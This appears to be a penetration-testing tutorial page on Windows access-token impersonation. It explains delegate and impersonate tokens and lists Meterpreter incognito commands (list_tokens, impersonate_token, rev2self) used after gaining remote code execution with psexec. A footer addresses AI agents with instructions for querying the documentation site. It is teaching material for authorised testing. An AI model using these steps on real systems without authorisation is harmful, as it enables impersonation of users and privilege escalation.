# Token impersonation Windows access tokens are integral to Microsoft’s authentication, access control and single sign-on (SSO) model and are created and managed by the Local Security Authority Subsystem Service (LSASS). They're Temporary keys that allows you to access the system and network without having to provide credentials each time you access a file.\ There are two types of tokens: delegate and impersonate : * Delegate tokens are created for ‘interactive’ logons, such as logging into the machine or connecting to it via Remote Desktop. * Impersonate tokens are for ‘non-interactive’ sessions, such as attaching a network drive or a domain logon script. The other great things about tokens? They persist until a reboot. When a user logs off, their delegate token is reported as an impersonate token, but will still hold all of the rights of a delegate token. * TIP: File servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts you can impersonate valid tokens on the system and become that specific user without ever having to worry about credentials, or for that matter, even hashes. During a penetration test, this is especially useful due to the fact that tokens have the possibility of allowing local and/or domain privilege escalation, enabling you alternate avenues with potentially elevated privileges to multiple systems.\ \ Now of to the attack, fire up metasploit and get RCE on your victim (using for example psexec), once you do that, load a tool called incognito : ``` meterpereter > load incognito meterpereter > list_tokens -u ``` Find the user you want to impersonate and : ``` impersonate_token domain\\user ``` and now when you type for example shell and whoami you should see that you're impersonating the user. if you want to revert back to the user you came in, type : ``` rev2self ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/token-impersonation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.